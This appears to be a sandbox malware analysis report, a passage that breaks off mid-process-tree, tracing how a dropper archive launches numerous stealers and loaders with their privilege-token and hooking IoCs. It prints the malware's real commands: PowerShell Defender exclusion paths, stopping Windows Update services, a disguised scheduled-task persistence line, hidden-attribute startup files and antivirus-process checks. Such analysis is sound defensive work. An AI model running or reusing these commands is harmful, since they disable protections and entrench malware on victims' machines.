2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2720	firefox.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4428	7zFM.exe
Token: 35	4428	7zFM.exe
Token: SeSecurityPrivilege	4428	7zFM.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	4896	4363463463464363463463463.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	1988	penis.exe
Token: SeDebugPrivilege	1988	penis.exe
Token: SeDebugPrivilege	1988	penis.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	3044	build_2024-07-25_20-56.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	2720	firefox.exe
Token: SeDebugPrivilege	4356	svchost.exe
Token: SeDebugPrivilege	1244	newfile.exe
Token: SeDebugPrivilege	4356	svchost.exe
Token: SeDebugPrivilege	1148	powershell.exe
Token: SeIncreaseQuotaPrivilege	1148	powershell.exe
Token: SeSecurityPrivilege	1148	powershell.exe
Token: SeTakeOwnershipPrivilege	1148	powershell.exe
Token: SeLoadDriverPrivilege	1148	powershell.exe
Token: SeSystemProfilePrivilege	1148	powershell.exe
Token: SeSystemtimePrivilege	1148	powershell.exe
Token: SeProfSingleProcessPrivilege	1148	powershell.exe
Token: SeIncBasePriorityPrivilege	1148	powershell.exe
Token: SeCreatePagefilePrivilege	1148	powershell.exe
Token: SeBackupPrivilege	1148	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4428	7zFM.exe
4428	7zFM.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif

Suspicious use of SendNotifyMessage 23 IoCs

pid	Process
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2988	Jurisdiction.pif
2988	Jurisdiction.pif
2988	Jurisdiction.pif

Suspicious use of SetWindowsHookEx 36 IoCs

pid	Process
2720	firefox.exe
2720	firefox.exe
3044	build_2024-07-25_20-56.exe
3288	TigerHulk3.exe
952	svchost.exe
2824	tdrpload.exe
4904	JJSploit_8.10.7_x64-setup.exe
4356	svchost.exe
1416	LummaC22222.exe
2752	ZZZ.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
4584	wwbizsrvs.exe
2720	firefox.exe
2720	firefox.exe
2152	splwow64.exe
2988	Jurisdiction.pif
2720	firefox.exe
2720	firefox.exe
2172	tn8cdkzn.exe
2824	prem1.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
5448	RegAsm.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
2720	firefox.exe
5608	Identification-1.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 4952 wrote to memory of 2720	4952	firefox.exe	95
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 964	2720	firefox.exe	96
PID 2720 wrote to memory of 816	2720	firefox.exe	97
PID 2720 wrote to memory of 816	2720	firefox.exe	97
PID 2720 wrote to memory of 816	2720	firefox.exe	97
PID 2720 wrote to memory of 816	2720	firefox.exe	97
PID 2720 wrote to memory of 816	2720	firefox.exe	97
PID 2720 wrote to memory of 816	2720	firefox.exe	97
PID 2720 wrote to memory of 816	2720	firefox.exe	97
PID 2720 wrote to memory of 816	2720	firefox.exe	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3952	attrib.exe
2108	attrib.exe
4028	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3560
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4428
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {992c224b-5b1a-4f3c-8bef-b4cd04233996} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" gpu
      4⤵
      PID:964
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e0f15251-7860-4582-90d2-5ed6f59fcbcb} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" socket
      4⤵
      PID:816
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3024 -childID 1 -isForBrowser -prefsHandle 2932 -prefMapHandle 3056 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc383c6d-924a-42ba-bc2d-203f8b308b1c} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:640
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2540 -childID 2 -isForBrowser -prefsHandle 4156 -prefMapHandle 2524 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49dbfd7d-f4e6-466f-bc18-f8c9fd038ea0} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:548
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4932 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4924 -prefMapHandle 4920 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4d99892-ae57-44fe-9866-ccff6a4216e0} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" utility
      4⤵
      Checks processor information in registry
      PID:3020
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5256 -childID 3 -isForBrowser -prefsHandle 5280 -prefMapHandle 5248 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {570b6862-36ed-4f55-99c6-a938b4931c2a} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:2948
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5408 -childID 4 -isForBrowser -prefsHandle 5416 -prefMapHandle 5420 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d1b09ff-e9f7-40f0-8938-d0f382d3fac0} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:4652
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 5 -isForBrowser -prefsHandle 5608 -prefMapHandle 5612 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4265c37f-05bd-46f6-b9e3-de809c92d444} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:724
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6148 -childID 6 -isForBrowser -prefsHandle 6136 -prefMapHandle 6112 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1008 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca942ab9-7385-44bb-95e8-ca201e879f96} 2720 "\\.\pipe\gecko-crash-server-pipe.2720" tab
      4⤵
      PID:4424
  - - C:\Users\Admin\Desktop\4363463463464363463463463.exe
      "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4896
    - - C:\Users\Admin\Desktop\Files\spoofer.exe
        
        "C:\Users\Admin\Desktop\Files\spoofer.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4932
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//run.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//productkey.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4224
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//OS.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//vgk.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1424
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//vlmd.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1108
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C://iduishopSpoofer//SX.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2224
    - - C:\Users\Admin\Desktop\Files\stealc_daval.exe
        
        "C:\Users\Admin\Desktop\Files\stealc_daval.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5044
    - - C:\Users\Admin\Desktop\Files\penis.exe
        
        "C:\Users\Admin\Desktop\Files\penis.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
    - - C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe
        
        "C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3044
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\Files\build_2024-07-25_20-56.exe" & rd /s /q "C:\ProgramData\HIIEGHJJDGHC" & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3264
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4016
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 1900
        6⤵
        Program crash
        
        PID:4184
    - - C:\Users\Admin\Desktop\Files\TigerHulk3.exe
        
        "C:\Users\Admin\Desktop\Files\TigerHulk3.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:3288
    - - C:\Users\Admin\Desktop\Files\Tracker.exe
        
        "C:\Users\Admin\Desktop\Files\Tracker.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:460
    - - C:\Users\Admin\Desktop\Files\svchost.exe
        
        "C:\Users\Admin\Desktop\Files\svchost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:952
    - - C:\Users\Admin\Desktop\Files\tdrpload.exe
        
        "C:\Users\Admin\Desktop\Files\tdrpload.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2824
      - C:\Windows\sysppvrdnvs.exe
        
        C:\Windows\sysppvrdnvs.exe
        6⤵
        Modifies security service
        Windows security bypass
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        System Location Discovery: System Language Discovery
        
        PID:4596
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1148
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4476
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2548
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4224
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3060
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:232
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1340
        
        C:\Users\Admin\AppData\Local\Temp\2621215564.exe
        
        C:\Users\Admin\AppData\Local\Temp\2621215564.exe
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:1296
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:2188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:4476
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\52836932.exe
        
        C:\Users\Admin\AppData\Local\Temp\52836932.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\3374731779.exe
        
        C:\Users\Admin\AppData\Local\Temp\3374731779.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\2075125208.exe
        
        C:\Users\Admin\AppData\Local\Temp\2075125208.exe
        8⤵
        Executes dropped EXE
        
        PID:1764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:320
        
        C:\Windows\System32\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
        9⤵
        
        PID:1044
        
        C:\Users\Admin\AppData\Local\Temp\1281923147.exe
        
        C:\Users\Admin\AppData\Local\Temp\1281923147.exe
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:864
    - - C:\Users\Admin\Desktop\Files\XSploitLauncher.exe
        
        "C:\Users\Admin\Desktop\Files\XSploitLauncher.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2784
      - C:\Users\Admin\AppData\Roaming\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4356
    - - C:\Users\Admin\Desktop\Files\newfile.exe
        
        "C:\Users\Admin\Desktop\Files\newfile.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1244
    - - C:\Users\Admin\Desktop\Files\JJSploit_8.10.7_x64-setup.exe
        
        "C:\Users\Admin\Desktop\Files\JJSploit_8.10.7_x64-setup.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4904
    - - C:\Users\Admin\Desktop\Files\esphvcion.exe
        
        "C:\Users\Admin\Desktop\Files\esphvcion.exe"
        5⤵
        Executes dropped EXE
        
        PID:216
    - - C:\Users\Admin\Desktop\Files\LummaC22222.exe
        
        "C:\Users\Admin\Desktop\Files\LummaC22222.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1416
    - - C:\Users\Admin\Desktop\Files\ZZZ.exe
        
        "C:\Users\Admin\Desktop\Files\ZZZ.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2752
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 476
        6⤵
        Program crash
        
        PID:2976
    - - C:\Users\Admin\Desktop\Files\Bloxflip%20Predictor.exe
        
        "C:\Users\Admin\Desktop\Files\Bloxflip%20Predictor.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3264
      - C:\Windows\Bloxflip Predictor.exe
        
        "C:\Windows\Bloxflip Predictor.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1576
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
        7⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2108
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3952
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Windows\Bloxflip Predictor.exe"
        6⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4028
    - - C:\Users\Admin\Desktop\Files\ENP.exe
        
        "C:\Users\Admin\Desktop\Files\ENP.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2676
    - - C:\Users\Admin\Desktop\Files\wwbizsrvs.exe
        
        "C:\Users\Admin\Desktop\Files\wwbizsrvs.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4584
    - - C:\Users\Admin\Desktop\Files\Gorebox%20ModMenu%201.2.0.exe
        
        "C:\Users\Admin\Desktop\Files\Gorebox%20ModMenu%201.2.0.exe"
        5⤵
        Executes dropped EXE
        
        PID:1744
    - - C:\Users\Admin\Desktop\Files\splwow64.exe
        
        "C:\Users\Admin\Desktop\Files\splwow64.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2152
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1924
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:408
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa opssvc"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2548
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:4588
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2848
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 197036
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:976
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
        7⤵
